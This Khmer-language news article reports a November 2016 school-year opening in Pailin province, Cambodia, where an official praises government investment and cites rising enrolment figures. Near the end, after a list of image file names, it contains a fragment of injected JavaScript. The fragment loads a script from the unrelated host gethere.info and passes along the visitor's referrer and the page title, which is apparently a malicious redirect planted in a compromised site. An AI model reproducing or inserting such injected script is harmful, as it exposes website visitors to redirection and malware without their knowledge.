Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

រយះពេល២០ឆ្នាំ ក្រោយបញ្ចប់សង្គ្រាម វិស័យអប់រំខេត្តប៉ៃលិន មានការរីកចម្រើន ដោយចាប់ផ្តើមពីសិស្សចំនួន ៥០០នាក់ រហូតដល់មានសិស្សចំនួនជិត ២ម៉ឺននាក់

ប៉ៃលិន៖មានប្រសាសន៍ថ្លែងនៅក្នុងពិធីបើកបវេស្សនកាលឆ្នាំសិក្សាថ្មី ២០១៦/២០១៧ នាព្រឹកថ្ងៃទី០៤ ខែ វិច្ឆិកា ឆ្នាំ២០១៦ នៅវិទ្យាល័យ ហ៊ុន សែន ក្រុងទេពនិម្មិតប៉ៃលិន ឯកឧត្តម អ៊ី ឈាន រដ្ឋលេខាធិការក្រសួងការពារជាតិ និងប្រធានក្រុមការងារថ្នាក់ជាតិចុះមូលដ្ឋានខេត្តប៉ៃលិនបានមានប្រសាសន៍ឱ្យដឹងថា៖ រាជរដ្ឋាភិបាលកម្ពុជាក្រោមការដឹកនាំរបស់ សម្តេចអគ្គមហាសេនាបតីតេជោ ហ៊ុន សែន នាយករដ្ឋមន្រ្តី នៃព្រះរាជា ណាចក្រកម្ពុជា បានធ្វើអោយប្រទេសជាតិមានសុខសន្តិភាព និងមានការអភិវឌ្ឍន៍រីកចំរើនលើគ្រប់វិស័យ ក្នុង នោះវិស័យអប់រំក៍បានយកចិត្តទុកដាក់ជាអទិភាពផងដែរ។ ជាក់ស្តែងនៅខេត្តប៉ៃលិនកាលពី២០ឆ្នាំមុន គឺមាន តែសាលា១ខ្នងនិងមានសិស្សតែ៥០០នាក់ប៉ុណ្ណោះ តែមកដល់ឆ្នាំសិក្សាថ្មី២០១៦/២០១៧ នេះមានសាលា រៀន គ្រប់កំរិតតាំងពីទីក្រុងរហូតដល់ជនបទ និងមានសិស្សចូលរៀនកើនឡើងជាងនាក់ ២ម៉ឺននាក់ ហើយ កាល ពីថ្ងៃទី១៩ ខែតុលា ឆ្នាំ២០១៦កន្លងទៅថ្មីៗនេះ ហើយក្នុងឱកាសអញ្ជើញចុះសាកសុខទុក្ខមន្ត្រីរាជការ កងកម្លាំងប្រដាប់អាវុធ លោកគ្រូ អ្នកគ្រូ សិស្សានុសិស្ស និងប្រជាពលរដ្ឋនៅខេត្តប៉ៃលិន សម្តេចតេជោ ហ៊ុន សែន បានផ្តល់អាគារសិក្សា សរុបចំនួន ២១ខ្នងស្មើនឹង ១៩៥បន្ទប់បន្ថែមទៀត។ នេះបានសបញ្ជាក់ពីការយក ចិត្តទុកដាក់របស់ប្រមុខរាជរដ្ឋាភិបាលកម្ពុជា ក្នុងការពង្រឹងវិស័យអប់រំនៅខេត្តប៉ៃលិន ឲ្យកាន់តែរីកចំរើនឡើង ពីមួយថ្ងៃ ទៅមួយថ្ងៃ ព្រមទាំងបានកសាងនូវធនធានមនុស្សមួយប្រកបដោយចំណេះដឹង និងចំណេះធ្វើ សំរាប់កសាងនិងអភិវឌ្ឍន៍សង្គមជាតិយើងឲ្យរីកចំរើន។

 

 

ឯកឧត្តម អ៊ីឈាន ក៍បានផ្តាំផ្ញើរដល់ក្មួយៗសិស្សានុ សិស្សទាំងអស់ ក្នុងឆ្នាំសិក្សាថ្មីនេះ ត្រូវយកចិត្តទុកដាក់រៀនសូត្រ ធ្វើខ្លួនឲ្យបានល្អ ចេះគោរពស្រឡាញ់មាតាបីតា លោកគ្រូ អ្នកគ្រូ ព្រឹទ្ធាចារ្យ និងមិត្តភក័្ត ហើយត្រូវជាសឱ្យឆ្ងាយពីគ្រឿងញៀន ព្រោះថាគ្រឿងញៀន ជាសត្រូវរបស់យើង និងត្រូវចូលរួមគោរពច្បាប់ចរាចរណ៍ឲ្យបានទាំងអស់គ្នា។

 

ទន្ទឹមនេះមាតាបីតានិងអាណា ព្យាបាលសិស្សត្រូវជំរុញកូនចៅឲ្យបានចូលរៀនគ្រប់ៗគ្នា ទោះមានការលំបាកយ៉ាងណាក៍ដោយ ព្រោះការ សិក្សាអប់រំ វាមានសារៈសំខាន់ណាស់ក្នុងការផ្តល់ចំណេះដឹងដល់កូនចៅជំនាន់ក្រោយឲ្យមានសមត្ថភាព គ្រប់ គ្រាន់ដើម្បីការពារ និងកសាងមាតុភូមិយើងឲ្យបានរុងរឿង។

 
គួរបញ្ជាក់ថា៖ បើតាមរបាយការណ៍របស់លោក តង់ ធារ៉ា ប្រធានមន្ទីរអប់រំ យុវជននិងកីឡាខេត្ត ប៉ៃលិន បានឱ្យដឹងថា៖ក្នុងឆ្នាំសិក្សា២០១៥/ ២០១៦ កន្លងទៅ សាលារៀនទូទាំងខេត្តមានចំនួន ៨៥សាលា ថ្នាក់រៀនចំនួន ៤៨២ថ្នាក់ សិស្សសរុបចំនួន ១៥១១១នាក់ ស្រីចំនួន ៧៣២០នាក់។ សាលាមតេ្តយ្យ ២៦ សាលា មានសិស្ស ៩២៣នាក់ បឋមសិក្សា ចំនួន ៥០សាលា មានសិស្សចំនួន ១០៣៥៣នាក់ អនុវិទ្យាល័យ ០៦សាលា និងសាលាវិទ្យាល័យ ចំនួន ០២ មានសិស្សចំនួន១១៦២នាក់ មានលោកគ្រូអ្នកគ្រូនិង បុគ្គលិកសិក្សាចំនួន ៧៨០នាក់ ហើយចំពោះលទ្ធផលប្រលងជាប់សញ្ញាប័ត្រមធ្យមសិក្សាទុតិយភូមិស្មើ៧៣,១១% កើន១៣,៦៣%។ ដោយឡែកសំរាប់ឆ្នាំសិក្សាថ្មី២០១៦/ ២០១៧នេះយើងមានសិស្សថ្មីទើបគ្រប់អាយុ ៦ឆ្នាំបានចុះឈ្មោះចូលរៀនប្រមាណជា១៦៥៦នាក់ ដែលចូលរៀនថ្នាក់ទី១។

 

 

ក្នុងឱកាសនោះ ឯកឧត្តម អ៊ី ឈាន ក៍បានចែកសៀវភៅដល់សិស្សានុសិស្ស ចំនួន២០០០នាក់ ដោយម្នាក់ៗ ទទួលបានសៀវភៅ ០២ក្បាល ប៊ិច ០២ដើម និងថវិកា ៥០០០រៀល និងលោកគ្រូ អ្នកគ្រូ ចំនួន ១៣០ នាក់ ដោយម្នាក់ៗទទួលបាន ២០០០០ រៀល ផងដែរ។ ដោយ៖ ញ៉ឹប បូរី

img-20161104-wa0166 img-20161104-wa0164 img-20161104-wa0162 img-20161104-wa0161 img-20161104-wa0160 img-20161104-wa0157 img-20161104-wa0156 img-20161104-wa0155s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More